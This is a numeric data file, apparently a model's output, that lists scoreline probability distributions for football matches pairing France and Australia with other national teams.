('FRA', 'PER',0.0110388696017115,0.00660274951618413,0.00279651774693728,0.000804695139998586,0.000175001183743374,0.0214533493902763,0.0188797443047207,0.00830743811903772,0.00243695136924727,0.0550655644769775,0.0484597420387724,0.0213231864666182,0.106004999592599,0.0932883369828206,0.136044610884721,0.0872984114990149,0.1197243106805,0.0410486007757501,0.00625506536575432,0.000536151930141976,3.05644594859397e-05,0.0768258446420826,0.0526809201581194,0.0338047984128326,0.0120414311166408,0.0154537221551289,0.00991649273805518,0.00137617246340426,0.00264922665931276,0.00339996237344261,0.00218172048438924,9.88250373683778e-05,0.000256615792613404,0.000503611434709625,0.00067147341940365,0.000558590602233991),
('FRA', 'DEN',0.0145606861752034,0.00855306855669996,0.0036592218936584,0.00106539694291179,0.00023460289581484,0.0252225013065086,0.0224989603756435,0.0100347545200474,0.0029837318879445,0.0601861657145346,0.0536872271753555,0.0239450239731933,0.107712588634578,0.0960817182323628,0.128512387219688,0.0766643615117849,0.114635541998723,0.0428533781218567,0.00711980860554974,0.000665386678967922,4.15025565509021e-05,0.0683860974340622,0.0511285634546509,0.0305008626566475,0.0127420148198826,0.0152025567600747,0.00906912035931151,0.00158775184260862,0.00284153109018199,0.00339024387388106,0.0020224578158059,0.000124840700874079,0.000301687353748481,0.00055138790419742,0.00068582493629043,0.000536377017998272),
('FRA', 'ARG',0.00410045246552514,0.00346734777875778,0.0019919574155783,0.000779464584424111,0.000230764107575279,0.00975402342900664,0.0117043083981855,0.00702227322278363,0.00280878456820048,0.0300294107501644,0.0360336928646791,0.0216192557401234,0.0693379647305648,0.0832018631917196,0.106734325513435,0.0821499180649169,0.12807550356774,0.0499189013224821,0.00864731832162568,0.000842597955847606,5.48957601092206e-05,0.0985755245428374,0.0768418900631245,0.0591426885612766,0.0199666739313413,0.030735391254843,0.023656025005383,0.00259408030927536,0.00598973621191694,0.00922020796351036,0.00709649238986877,0.000213124436215502,0.000664854114773559,0.00156918811443279,0.00252265204241865,0.00270470480976206),
('FRA', 'ICE',0.045251539061996,0.0209486668078579,0.00800631178023406,0.00209107046423333,0.000413763924712155,0.0499995129375543,0.0401829556485667,0.0161468565370955,0.0043255649370306,0.0892810248566961,0.0717522081976243,0.0288324388608824,0.119567685730519,0.0960925963161235,0.10675229511832,0.0476552357913543,0.0857932905362413,0.0386132215002662,0.00772389265360657,0.000869078386007364,6.58317458373243e-05,0.0382989376040039,0.0344746157114367,0.0153897950271132,0.0103440565439861,0.0092353696582616,0.00412275650089744,0.00155185929671851,0.00207829407184617,0.00185554032216037,0.000828330777103293,0.000148443822381287,0.000269145845177026,0.000369709845884415,0.000347051889843464,0.000204420531797073),
('FRA', 'CRO',0.00976822263967451,0.00625440664439337,0.00282760136708725,0.000869304751754944,0.000202063138306603,0.0192576450209888,0.0181242805947823,0.00852880886319128,0.00267562180815758,0.0503817864465125,0.0474166822281631,0.0223130412010452,0.0988564958011023,0.0930385240024587,0.129314016715788,0.0845777244259987,0.121703537542669,0.0437814777795288,0.00699995281890941,0.000629538559409961,3.77269643454707e-05,0.0796000968910924,0.0572704778127564,0.0374577080908292,0.0137349398514298,0.0179666518334988,0.0117510735976234,0.00164699667199543,0.00323165038545027,0.0042273164608677,0.0027648727939104,0.000124381299071968,0.000329388204278674,0.000659511186739248,0.000897962277022374,0.000773616203182881),
('FRA', 'NGA',0.0247020998229956,0.0111746145885597,0.00378702036842353,0.000871151965938656,0.000151399832881924,0.0383448261524236,0.0269516802115343,0.00947185238677756,0.00221918106608455,0.0825587653892004,0.0580286225469867,0.0203934798372187,0.133315568745085,0.0937043908284678,0.14351830308217,0.0772509299306612,0.100875653831285,0.032931310810831,0.00477803311097943,0.000389952598734251,2.11271949129252e-05,0.0542978693203235,0.035451567212522,0.0190823503055124,0.00771554902341595,0.00830602542232168,0.00447084569788073,0.000839591891324174,0.00135576967482469,0.00145952768257067,0.000785613181850214,5.72797208745901e-05,0.000124693815882551,0.000205080389006977,0.000228946781189495,0.000154064680986263),
('FRA', 'BRA',0.00111022752523338,0.00121613401308766,0.000854732033946004,0.000408721731233748,0.000147802094834766,0.00363553763445161,0.00532484325492426,0.00389955469320692,0.00190384656440351,0.0144178303814672,0.0211172856883321,0.0154648703391548,0.0428837190967729,0.0628102650388221,0.0850342164257395,0.0843072629361061,0.124546606114468,0.0459979856847811,0.00755028268110596,0.000697124164030552,4.29369007258406e-05,0.123481863076399,0.0912095021665713,0.0904297564515554,0.0224572070159719,0.0445304428331984,0.0441497541860492,0.00276465793025156,0.00822306900155864,0.0163055407480958,0.0161661454523499,0.000214629813784785,0.000861879692116237,0.00261732925101992,0.00540778320070691,0.00780520123559698),
('FRA', 'SWI',0.0107187653912447,0.00680304638624198,0.00307479779400304,0.000945497562785275,0.000219862793573578,0.0203855449537908,0.0191993872996573,0.00904112383352538,0.00283835169311539,0.0520951750006519,0.0490639540688339,0.0231045542014065,0.0998467516259804,0.0940370473011764,0.127578978413202,0.0815068866432759,0.120155640842664,0.044282693833891,0.00725339589897726,0.000668299689464849,4.10711109079252e-05,0.0767643096027472,0.0565821195853744,0.0361488425792581,0.0139020171975816,0.0177632734472328,0.0113484927790212,0.00170783706564972,0.00327327786708533,0.00418242396016647,0.00267204174116614,0.000132291508882788,0.000342311011621371,0.000669818664814103,0.000891711453009143,0.000752424803892227),
('FRA', 'CRC',0.0243146061928303,0.00978431770538483,0.00290246156226004,0.000582884250400069,8.83406171046016e-05,0.0400623194960156,0.024515730160806,0.0075010762342059,0.0015300691787763,0.0881569597980592,0.0539467575865443,0.0165060856270899,0.145491754944622,0.0890322040689435,0.160076986966241,0.0880621783892272,0.0979574889019975,0.0272411772213178,0.00336691057279014,0.000234077579544392,1.07444649662747e-05,0.0538887570645471,0.0299720459943708,0.016488339211451,0.00555665405316785,0.00611369653753522,0.00336329065975966,0.000515086695656108,0.000850084525048283,0.000935303649943271,0.000514532903388353,2.97392282570012e-05,6.60573050704267e-05,0.000110732288012449,0.000125663053461655,8.38319600766803e-05),
('FRA', 'SRB',0.0233875359231976,0.0129553214078786,0.00550385639522196,0.00159549396511087,0.000350187271000541,0.0332470460172006,0.0296099634201687,0.0131853809401614,0.0039143191560255,0.0700786695967489,0.0624123671685087,0.0277923624834157,0.110784727985523,0.0986653593665907,0.116756934508506,0.0615255460012728,0.103984232405469,0.0439358985482666,0.00825066620022182,0.000871527405508582,6.17827309321199e-05,0.0547949181879525,0.0463044042500397,0.0244002959288024,0.0130431672854321,0.0137463011032323,0.00724366980372077,0.00183701977804434,0.00290407534255058,0.00306062884969357,0.00161281093818822,0.000164345552113986,0.000351406963840819,0.000568905183324632,0.000628461369577337,0.000440233581022565),
('FRA', 'GER',0.00277883058709938,0.00284483286477739,0.00198171602850091,0.000943722492080881,0.000340534288552581,0.00667511323454067,0.00978515701424328,0.00717211037693979,0.00350457106848209,0.021422342668798,0.031403360401801,0.0230173482838032,0.0515628067975747,0.0755867567906627,0.0827398785137375,0.0663839686166004,0.121289733094999,0.0554019278329853,0.011247168354792,0.00128435192661685,9.88119806667558e-05,0.0973133388630421,0.0889002958338503,0.071326602777897,0.0270715289109169,0.0434401296667923,0.0348529422124133,0.0041218517368283,0.00992114858959307,0.0159198980816203,0.0127728736567373,0.000400514591170209,0.00130544715281842,0.00322414010879188,0.00544360664450003,0.00651647322091623),
('FRA', 'MEX',0.0134733986585351,0.00819753724936726,0.00361976726158796,0.00108816615940652,0.0002474433369412,0.0236869468717433,0.0218244603180699,0.0100542098302927,0.00308788499504105,0.0573375851773472,0.0528291746172549,0.0243376284692492,0.104095264739187,0.0959103335225304,0.125988611805046,0.0762432870713819,0.116082223418504,0.0441844886001819,0.00747465977273028,0.000711271738670441,4.52074126538363e-05,0.0702483356009707,0.0534773833949164,0.0323623812945422,0.013570098661656,0.0164241658515706,0.00993925065121746,0.00172173324494204,0.00312577304028681,0.00378318655656508,0.00228943373963925,0.00013796868087226,0.000338302114421488,0.00062747278248139,0.000792323234491626,0.000633179153090913),
('FRA', 'SWE',0.0120916586649626,0.00798662962211333,0.00383282931515285,0.00125427638084032,0.000310687083125754,0.0211997917608886,0.0212988916544289,0.0106992273986395,0.00358308055915494,0.0519221100017527,0.0521648234977906,0.0262043357874304,0.0953749524090055,0.0958207892236661,0.116795222006104,0.0715131359906556,0.117341189353206,0.0481343550666836,0.00877560992277342,0.000899957479291449,6.18519552123375e-05,0.0718474290933115,0.058944854431226,0.0360916424361039,0.0161197874800592,0.0197401320773499,0.0120867851053637,0.00220415802965,0.00404878513551741,0.00495810217267399,0.00303582140467587,0.0001911214156853,0.000474641334123119,0.00089223231252018,0.00114368959051576,0.000946783236200995),
('FRA', 'KOR',0.0402014604771421,0.0173234378398831,0.00596506871898581,0.00139851648959224,0.000248032064545096,0.0497235647654473,0.0357346889318184,0.012840672215251,0.00307605612115656,0.0933298138329939,0.0670730644739316,0.0241016015845398,0.131383191116572,0.0944207738839115,0.123301384620508,0.0578583581359549,0.0886126456351365,0.0339285507722466,0.00577367585131144,0.00055266506506956,3.53437476844121e-05,0.041580897102752,0.0318414954974978,0.0149414108831687,0.00812777746643075,0.00762781149537682,0.00357930002693305,0.00103733768643201,0.00146029151791513,0.00137046424720162,0.000643081271724219,8.36437951266723e-05,0.000159044770646074,0.000228766883267643,0.000224046254311375,0.000134018195878934),
('FRA', 'BEL',0.00864963366544215,0.00738867841123384,0.0046454757626391,0.00200497343399796,0.000656828439839873,0.0144736957441123,0.0193135993300774,0.0128859665726532,0.00573164817438405,0.0362293279326752,0.0483441642038321,0.032255058897452,0.0680146362922157,0.0907582594765511,0.0851242352339307,0.0532689419453008,0.1135891897725,0.0605535963452305,0.0143469757120568,0.0019120679040468,0.000173184566057943,0.0710817070952458,0.0757863139546308,0.047425468754031,0.0269340998199616,0.033709577436217,0.0210947389837425,0.0047861262492984,0.00898516905142657,0.0112454566494213,0.00703716838994455,0.000548474669337353,0.00139803445449895,0.00270485554825301,0.00359240480650228,0.00334172391719618),
('FRA', 'TUN',0.0383864071010752,0.0162149581983743,0.00541627889590366,0.00123059503083619,0.000211414475424831,0.0492323996322326,0.034251561401472,0.0119146077298935,0.00276304439951044,0.0940319762586159,0.0654191555273108,0.0227564392464544,0.134698074212576,0.0937110397627569,0.128634052078033,0.0614215141929219,0.0894922280039812,0.0325979381099314,0.00527730777530831,0.000480570648657073,2.91760431322876e-05,0.0427316722415638,0.0311303995471518,0.0148644643212887,0.0075595900739771,0.00721926210860228,0.00344712774652352,0.000917871323816687,0.00131482400575121,0.00125563146034538,0.000599551862953821,7.02309685890617e-05,0.000135801020443334,0.000198555916910962,0.000197465662209745,0.000119056665526611),
('FRA', 'PAN',0.0736875900411811,0.0227337232134537,0.00596369775101267,0.00106243207167203,0.00014302373469162,0.0757341942288117,0.0412455758691424,0.0112313700970888,0.00203890432043734,0.123025641495825,0.0670009561973467,0.0182446849159942,0.149885813993066,0.0816292663533391,0.121740242999811,0.0494399248695367,0.0663009157238291,0.0222280446290021,0.00331207738492035,0.000277601761314203,1.54612134285192e-05,0.0269254620444012,0.0180540605041552,0.0073319337379414,0.00403520281472103,0.00327747208445214,0.00133101404781629,0.000450947357581552,0.000549402636209193,0.000446235762111137,0.000181220786235076,3.16327620595737e-05,5.19707725704012e-05,6.45212281522437e-05,5.43984555027506e-05,2.69388777040789e-05),
('FRA', 'ENG',0.00253585065621218,0.00210342961757554,0.00113714497769531,0.00041713823671178,0.000115588762779769,0.00738093706311562,0.0082698569986402,0.00463291680941996,0.00173029337480566,0.025848062718163,0.0289610628763253,0.0162244879253,0.067889992209207,0.076066293806324,0.118875473503797,0.104075562103507,0.133192189300021,0.0426136523598342,0.00605949235040888,0.00048467012565533,2.57160345769872e-05,0.116609857026174,0.0746165662590027,0.0653268571451053,0.015915269664366,0.0278676599558592,0.0243981562296179,0.00169731616709799,0.00445800455598063,0.00780597235659146,0.00683413438307562,0.000113385786859984,0.000401389499581294,0.00107335861584861,0.00194760103614603,0.00229397734946714),
('FRA', 'POL',0.0257829028862448,0.0164408012701612,0.0084018664942548,0.00294998567193325,0.000786478710806166,0.0310950795980956,0.0337863385688991,0.0183552621290314,0.00664796605366387,0.0615275356635841,0.0668527039682247,0.0363193810678517,0.0913079583754819,0.0992106029501181,0.0903350905983946,0.0446862942650758,0.0981535340979305,0.0538986081434988,0.0131542666474522,0.00180583580092678,0.000168790644566577,0.0485538640499822,0.0533243294056364,0.0263780847456243,0.0195211659064778,0.0193131718430963,0.00955369695713701,0.00357318997346784,0.00530267753854138,0.00524617858487606,0.00259514080805136,0.000422721449103926,0.000852225517217651,0.00130460102935573,0.00137212043978402,0.000968542591557367),
('FRA', 'SEN',0.0266495696169442,0.0120060832603646,0.00409111343228845,0.000946743185760804,0.000165557313931143,0.0399407154189586,0.0282563916481091,0.00999510975950547,0.00235704120442774,0.0841763108019208,0.0595512318836187,0.0210650073938355,0.133053161903146,0.0941295671176182,0.140206856487869,0.0738725871863144,0.0991905079094034,0.0332963729648153,0.00496753828557276,0.000416877105883207,2.32485117753207e-05,0.0522617768284834,0.0350865753137283,0.018486514560412,0.00785193208723168,0.00827409660589926,0.00435947954485497,0.000878581579296734,0.00138872868152143,0.0014633946323831,0.000771037524673826,6.17111003679137e-05,0.00013154126845387,0.000211878201287671,0.000231772030645833,0.000153210853097879),
('FRA', 'COL',0.00388807683159307,0.00296532627933663,0.00150542862832931,0.00051883081847128,0.000135097026198252,0.0101076823113594,0.0106450668471088,0.00560551097119792,0.00196784442969494,0.0324130045316042,0.0341362727206812,0.0179755800503548,0.0779557689687988,0.0821003615099804,0.124993080263844,0.100205990656682,0.131638456161146,0.0432326526261789,0.00631042294884079,0.000518116687226893,2.82462304933248e-05,0.105533537379025,0.0693185698916741,0.0555721640929023,0.0151770525628249,0.0243346525119011,0.019508903669658,0.00166148064548009,0.00399598874639611,0.00640710685968113,0.00513652826830356,0.000114064450879944,0.000369857827867502,0.000906095023156076,0.00150692134847158,0.0016092678368194),
('FRA', 'JPN',0.0466072615118034,0.0232106580767929,0.00973654770215872,0.00280017609728906,0.000610940833855125,0.0479459794125773,0.0425747821683701,0.0189026493867876,0.00559502027008647,0.0835455820319157,0.0741863029959389,0.0329377533697879,0.109183257322624,0.096951891564122,0.0951255860545233,0.0414389410249875,0.084469045257369,0.0430453785147952,0.00974928931834732,0.00124205810448029,0.000107252931534094,0.036796701392734,0.0375031571558564,0.0163372566949717,0.0127410586947756,0.011100609241894,0.00483568628373672,0.00216427880976904,0.00282843214994474,0.00246426304249119,0.00107349089896086,0.000236325560392445,0.000418994604249238,0.000563559305341732,0.000519677155615541,0.000308369492227007),
('AUS', 'PER',0.000678628942816876,0.000867446077242913,0.000707618760218108,0.000393469452194909,0.000165581302473908,0.00234735345875852,0.00400563447874283,0.00341770164979315,0.00194404234484966,0.00993160967134933,0.0169477664220253,0.0144602333458653,0.031515344534928,0.0537792679698662,0.0666704239643008,0.0705203369528984,0.113769550958486,0.0458857376629547,0.00822520770426835,0.000829351350518846,5.59986567708631e-05,0.120339223774374,0.0970708595780504,0.102676259107293,0.0261005278347939,0.0552154286147555,0.0584038678529514,0.00350897043776096,0.0111347924423503,0.0235555518697643,0.0249157775846262,0.00029887203690094,0.0012819143188993,0.00416122601769877,0.00920743037082779,0.0149985626902867),
('AUS', 'DEN',0.000921214423590721,0.00116603740436245,0.000960237658220034,0.000540083819368567,0.000230085837793441,0.00285842941497611,0.0049441722721519,0.00427592147783016,0.00246532732250604,0.0112432575493567,0.0194472537726304,0.0168187768374446,0.0331679102321537,0.0573699183320251,0.0652308143696395,0.0641442151999288,0.112828528144346,0.0496158411305721,0.00969704197877948,0.00106605772088085,7.88072052674449e-05,0.110949057740886,0.0975787048363499,0.0959532623107393,0.0286065329783347,0.0562600245058478,0.0553228585896054,0.00419319835415415,0.0123700472025705,0.024327979880756,0.023922730260701,0.000391345825579423,0.00156243803202952,0.00472488439804177,0.00975878506997667,0.0149942263375443),
('AUS', 'ARG',0.00017319532149553,0.000305505917673922,0.000337726816141672,0.000255252677933083,0.000146185956277382,0.000713729257372774,0.00166068509047354,0.0019320175971718,0.00149845467078374,0.00362203530513583,0.008427649513135,0.00980460850499373,0.0137858364528257,0.0320764951421307,0.0349802014049172,0.0443794068831334,0.0813909452846868,0.0373173417559381,0.00760436210882369,0.00087164050822331,6.73258434462599e-05,0.103260751291278,0.0946890770818102,0.12013210074346,0.0289429791619264,0.073439957292906,0.0931733270616237,0.004423403778896,0.0168359267437855,0.0427195049318414,0.0541982668787525,0.000431537586039012,0.00222431482670098,0.00868769309156936,0.0231991207983805,0.0521336281425246),
('AUS', 'ICE',0.00372526722097063,0.00389144810907395,0.00285848302752435,0.00144108376478681,0.00055140634357162,0.00768509420026012,0.0119761471686368,0.00933157728892854,0.00484732045418235,0.0226203203855895,0.0352506135748299,0.0274665817331569,0.0499355194302041,0.0778175405602974,0.0734901498080412,0.0540777604842695,0.114524145913069,0.0606338903445023,0.0142676119287536,0.00188846817033376,0.000169804774796907,0.0842726453617163,0.0892349521083894,0.0656635804872823,0.0314964863691659,0.046353407917028,0.0341091765020787,0.00555852068143704,0.0122707199880298,0.018058829876262,0.0132885982573927,0.000632308838169322,0.00189497818101715,0.00431030597498248,0.00672885578412613,0.00766897068008052),
('AUS', 'CRO',0.000563019514773326,0.000767707349973009,0.000668263263918553,0.000396939292775522,0.000178518869715739,0.0019666785981144,0.0035890773366875,0.00327493168967067,0.00199218844025762,0.00848125148085674,0.0154778048156294,0.0141230596953435,0.0274313861262718,0.0500607299810557,0.0591485778175592,0.0637691847166483,0.107942812997424,0.0456790020507938,0.00859126202689161,0.000908907839363637,6.45370294811472e-05,0.116375159553269,0.0984947678178825,0.106189045863032,0.0277871993895686,0.0599157956459166,0.0645963365640745,0.00391964196181117,0.0126775172713447,0.0273357355478084,0.0294711662364966,0.000351236880293525,0.00153658311582771,0.00508973926865912,0.0115042849165732,0.0196581354497013),
('AUS', 'NGA',0.00196180386646746,0.00194859127446227,0.00127230188464763,0.000565662418026015,0.000190249593369377,0.00557433008670686,0.00759737526772903,0.00517731369159016,0.00235209100656848,0.0197835972497518,0.0269634933909647,0.0183745647130408,0.052659787909816,0.0717711660498822,0.0934462095947219,0.0829114057824849,0.127359863982755,0.0489092387248257,0.00834769747124973,0.000801428950330969,5.14115064965072e-05,0.113001751583862,0.0867907592188843,0.0770062679586022,0.0222198204311318,0.0394296688152363,0.0349845037609069,0.00284431444335331,0.00757096868910889,0.0134348875116846,0.0119202845674999,0.000230063235117793,0.000827188134734255,0.00224988658566745,0.00416691551021151,0.00530102906687248),
('AUS', 'BRA',3.33011698090316e-05,7.4448291665113e-05,0.000100725907864015,9.30505139768195e-05,6.51014478719589e-05,0.000185058727124051,0.00052558090543676,0.000746344937233236,0.00070655885652313,0.00120975381768488,0.00343579314921033,0.00487895735131937,0.00593124270122418,0.0168451818388706,0.0193866660949518,0.031683311677634,0.0550596109566599,0.0239208008741617,0.00461887038445341,0.000501670266145917,3.66170595716743e-05,0.0899830226736806,0.0781867481456273,0.127779325151921,0.0226456332314926,0.0740187768538082,0.120967677762146,0.00327948608055751,0.0160788315727719,0.0525547435167273,0.0858893587387967,0.000302167738963499,0.00200462744148767,0.0100719493393387,0.0345529018257493,0.110911747204389),
('AUS', 'SWI',0.000625032783115888,0.000846988519536883,0.000736945239586095,0.000437786523483652,0.000196958551176457,0.00211049638608862,0.00385426420187406,0.00351939776721894,0.00214241681337139,0.00889029049206886,0.0162357673833058,0.0148251703788519,0.0280872069555576,0.0512938648049825,0.0591575116147294,0.0622990243562538,0.108035569637325,0.0468373478857287,0.00902475263710988,0.000978139607783688,7.12366809576482e-05,0.113772712889121,0.0986492162049905,0.103887904601279,0.0285120149074265,0.0600522456972774,0.0632412725827181,0.00412033174390384,0.0130174160810407,0.0274173912780444,0.0288733700994709,0.0003787939702399,0.00161926832594495,0.00524227580828523,0.0115875171148312,0.0194001432085536),
('AUS', 'CRC',0.00206547130646608,0.00182387119166349,0.00104339298883174,0.000405180913778066,0.000118875368793259,0.00624406668647638,0.00740914509469186,0.00439580755544227,0.00173867329428933,0.0226487485689287,0.0268747713287291,0.015944663162589,0.0616143898073931,0.0731109991173868,0.111745188916545,0.101331744784202,0.13259568801685,0.0433763785428348,0.00630659092273279,0.000515772947202663,2.80041952234739e-05,0.120239202670674,0.0786683375415497,0.0713372985418753,0.0171566543858456,0.0311156791703248,0.0282160340954746,0.00187083392705413,0.0050894772616508,0.00923038595151981,0.00837021372076816,0.000127911364233844,0.000469119501142695,0.00129986926466411,0.00244491169616103,0.00302585488855071),
('AUS', 'SRB',0.00159463741795171,0.00193519917835155,0.00158098593730335,0.000884906772455264,0.000375644288907219,0.00411614204785552,0.00710832023482256,0.00613781254064259,0.0035332063028071,0.0143014246128629,0.0246976670825455,0.0213256642548614,0.0372674357892897,0.064358533996409,0.0647423506354588,0.0562363881097679,0.111805995935387,0.0555715842858889,0.012276030077148,0.00152540665288332,0.000128288994653893,0.0971167299102961,0.0965409859574766,0.0838572634684479,0.0319895517426999,0.0555734176965361,0.0482720855127089,0.00529998430485071,0.0138109894721689,0.0239929553534446,0.0208407191878766,0.000563485023173799,0.00199117161648458,0.00533635567265491,0.00979823878275687,0.0134983664988624),
('AUS', 'GER',9.06276679868988e-05,0.000192022684846033,0.000257056320852904,0.000236275336980495,0.000164859925307273,0.000372653232639429,0.0010592680644714,0.00150548651418067,0.00142645015641746,0.00197137561837238,0.00560364181152812,0.00796418532806839,0.00782159153937904,0.0222329002014064,0.0206885295860547,0.0273611357917472,0.0588072147829284,0.0315985467201309,0.0075460745081091,0.00101367233926242,9.25863439062169e-05,0.0777741203171214,0.0835798526942331,0.110536599012943,0.0299396583675314,0.0791920039309825,0.104733551225251,0.00536243552883375,0.0212758948481978,0.056275884239242,0.0744263677157821,0.000619755773989959,0.00333909947214328,0.0136566675051253,0.0383508036436405,0.102192078369339),
('AUS', 'MEX',0.000823866843113954,0.00107748272881942,0.000915690800112851,0.00053173189004853,0.000233916879032074,0.00258705045855612,0.0046220128786362,0.00412883385780616,0.00245885208789473,0.0103226541067875,0.018442408057981,0.0164745622326645,0.0308915083553827,0.0551906318590961,0.0616304862811849,0.0614783324200076,0.110108753529002,0.0493016690859565,0.00981112661299067,0.00109824355950656,8.27404063665157e-05,0.109836916115252,0.0983599054240457,0.0981170736649871,0.0293607144640865,0.0585764569721754,0.0584318429241581,0.00438212882640123,0.0131139305700581,0.0261631095766663,0.0260985178724189,0.000416883107216877,0.00168887761729588,0.00518330852179858,0.0108697927256553,0.0171696637770442),
('AUS', 'SWE',0.000682090845075737,0.000965183733363841,0.000890952479230605,0.000563021606790642,0.000269750806786016,0.00212502616544218,0.00413982054845148,0.00403244780042862,0.00261857328884524,0.00857908919740597,0.016713154089107,0.0162796721877361,0.0259764230156195,0.0506053673710662,0.0524356014303892,0.0529228426814842,0.102151203501425,0.0492928376863264,0.0105716222135427,0.00127532823890336,0.000103958821574979,0.103100411269376,0.0995017515975512,0.100426340171192,0.0320095670136334,0.0646140115933968,0.0652144168712657,0.00514871529369894,0.0155896743090809,0.0314690728592236,0.0317614892712121,0.0005303919162023,0.00217667380044164,0.00677262411615917,0.0144260213311798,0.0240273195464751),
('AUS', 'KOR',0.00344047808314704,0.00332546721624843,0.00220371818493526,0.000997992769943981,0.000342412654954177,0.00793030936721696,0.0110512067524856,0.00770015172365476,0.00357682425670951,0.0245360380444584,0.0341919610900776,0.0238239401379114,0.0569350893239848,0.0793413490514808,0.0880773657767257,0.0681269007766281,0.122739370476095,0.0552826889713601,0.011066541288258,0.00124611230621114,9.44653812335375e-05,0.0949375908335845,0.0855211377634608,0.0661496857374817,0.0256795541159851,0.0397257211275512,0.0307274205770109,0.00385541818573392,0.00894637424299454,0.013839849659176,0.0107049757469391,0.000369082706386651,0.00115951180342247,0.00275980072165753,0.0044889857695014,0.0051012313852499),
('AUS', 'BEL',0.000359251074890335,0.000651033020734772,0.000785429020730979,0.000653772876290933,0.00041394191034588,0.00104986054095983,0.00271648440584885,0.00351441321933747,0.00303114821241278,0.00433180217797664,0.0112084154100482,0.0145007286624162,0.0134050019338529,0.0346850627230865,0.0276550143125472,0.028526658198227,0.0715565660319792,0.0448733085620176,0.0125067415299706,0.00196075253083329,0.000211173089549402,0.0738119198913957,0.0925752936596002,0.0954931257666983,0.0387028048621012,0.0798453165227924,0.082361919159866,0.00809020984422527,0.0250356027702474,0.0516493735958334,0.0532772831020518,0.00110482123714827,0.00465727761969535,0.0149336093508946,0.0330379790469691,0.066464877727379),
('AUS', 'TUN',0.00331213290759874,0.00313124100206459,0.00201364500346973,0.000883892652551537,0.000293800036432753,0.0079077534782016,0.010667786527722,0.00719557518546514,0.0032356791864387,0.0248962447504537,0.0335857491096396,0.022654070012609,0.0587862600025807,0.0793043528986329,0.0925393742371003,0.0728362017231421,0.12483827328351,0.0534919247150167,0.010186997000044,0.00109125603524034,7.85046565422095e-05,0.098258127749486,0.0842052078095871,0.0662765179981011,0.024054047519724,0.0378650811473126,0.0298029753436901,0.00343563787283514,0.00811240021503722,0.0127702704582245,0.0100512673964184,0.000311956307794433,0.000996513935274153,0.00241050861247897,0.00398001033809894,0.00453618128416473),
('AUS', 'PAN',0.00814899730902175,0.00583730730532919,0.00294975990326389,0.00101555612382964,0.000264558706944714,0.0162031668294682,0.0171110669558051,0.0090349193909909,0.00318038879408821,0.0433870074251168,0.045818079692484,0.0241926852218382,0.0871326157929027,0.0920148535504361,0.116656931578992,0.0780926841320312,0.123193483602021,0.0485853270721953,0.00851608538479712,0.000839648294896341,5.53811294834811e-05,0.0824683940494603,0.0650481467178182,0.0435446424507483,0.0171025576533199,0.0228976472223805,0.0153281824551784,0.00224831523297658,0.0045152131710027,0.00604516356086636,0.00404676380644849,0.000187024734820485,0.000507525544807892,0.00104211976532918,0.00145787574607715,0.00132578715424571),
('AUS', 'ENG',0.000108984732863686,0.000186941704706627,0.000194739506285415,0.00013807595135376,7.40467738226168e-05,0.000547090006421917,0.00118860377176976,0.0012911759579609,0.000935066500719572,0.0031581404613217,0.00686135301329332,0.00745346284460806,0.013673048844378,0.029705966545268,0.0394646294742921,0.0569535367447893,0.0857405671718017,0.0322694835084795,0.0053977797351165,0.000507879670878921,3.19026231910782e-05,0.123736840000469,0.0931396665428101,0.134414879640486,0.0233694817799694,0.0674515208677781,0.0973429301987342,0.00293179425552968,0.0126930915671647,0.0366361710020062,0.0528716356683487,0.000232165205326673,0.00135737556368728,0.00600242908744588,0.0180663393343842,0.0437799966017189),
('AUS', 'POL',0.0015417551394982,0.00216180332068035,0.0021192050810325,0.00143478122048524,0.000739226118880692,0.00336257518755148,0.00708456657084492,0.0074631912592683,0.00524136734081824,0.0109674588946085,0.0231071985957399,0.0243421302999113,0.0268288026057155,0.0565252603956352,0.0437527450477635,0.0356762604605912,0.0921820978444189,0.0595461733747612,0.0170953741271807,0.00276074242040355,0.000306938083440995,0.0751658559688314,0.0971086403118424,0.0791829893406026,0.0418190231972928,0.0681989832713542,0.0556098751673802,0.00900450616731805,0.0220269910146353,0.0359218909690514,0.029290933335721,0.00126996749391441,0.00423463796567562,0.0107453085662558,0.0188311735557346,0.0272777335792026),
('AUS', 'SEN',0.00213563778715125,0.00211894679263817,0.00139086723538035,0.000622022627779951,0.00021049046077484,0.00587339700540815,0.00805716103733966,0.00552643077948321,0.00252706356650768,0.0204041998773843,0.0279906030698715,0.0191988381049798,0.0531631914528632,0.0729295830675542,0.0923445480975526,0.0802013134491942,0.126678801766208,0.0500226184795838,0.00877902686748402,0.000866660217596314,5.72377738137533e-05,0.110020640060821,0.0868893678486014,0.0754634850653701,0.0228737754447891,0.0397317843231209,0.0345070862768005,0.00301078035238037,0.00784459539006611,0.0136260746675844,0.0118342566833789,0.000250781401807072,0.000882941636854395,0.00235220082038312,0.00426944751383443,0.00534186320440117),
('AUS', 'COL',0.000184141754730578,0.000292732969244387,0.000286316813340349,0.00019071049147292,9.61001905953001e-05,0.000831757501517883,0.00169857747534887,0.0017343789713332,0.00118062337842828,0.00439663685787558,0.00897861254085185,0.00916785781549569,0.0174303348254333,0.0355954398586609,0.0460680260765671,0.060878435435864,0.0940780351059552,0.036345697068388,0.00624072791816683,0.000602753889748186,3.8909492860847e-05,0.124323181909548,0.0960609498949132,0.126943583959199,0.0247411784699084,0.06539043950284,0.0864128114102401,0.00318613293304667,0.0126313283576887,0.0333843480341303,0.0441170818342921,0.000259344332597722,0.00138892760974779,0.0056273559983563,0.0155267903639968,0.0336345647368895),
('AUS', 'JPN',0.00363067320934229,0.00408619743584465,0.00329061827725134,0.0018256019459443,0.000769935373099727,0.00695868992935904,0.0119817305834955,0.0103152942028482,0.00592041879926117,0.0199873373714349,0.0344149392913132,0.0296284598697336,0.0430569898129183,0.0741371230665275,0.0618359626830293,0.0444026196158955,0.106471455512515,0.063826025001548,0.0170051272757196,0.00254849920438771,0.000261547068246338,0.0764540784026707,0.0916632518285727,0.065820734845892,0.0366326728904098,0.0526097296553548,0.0377775280374656,0.00732001481687265,0.0157688739397042,0.0226463462663243,0.0162616874602233,0.000951949267478798,0.00279077711052833,0.00621950897807528,0.0095489907262748,0.0111631241496448),
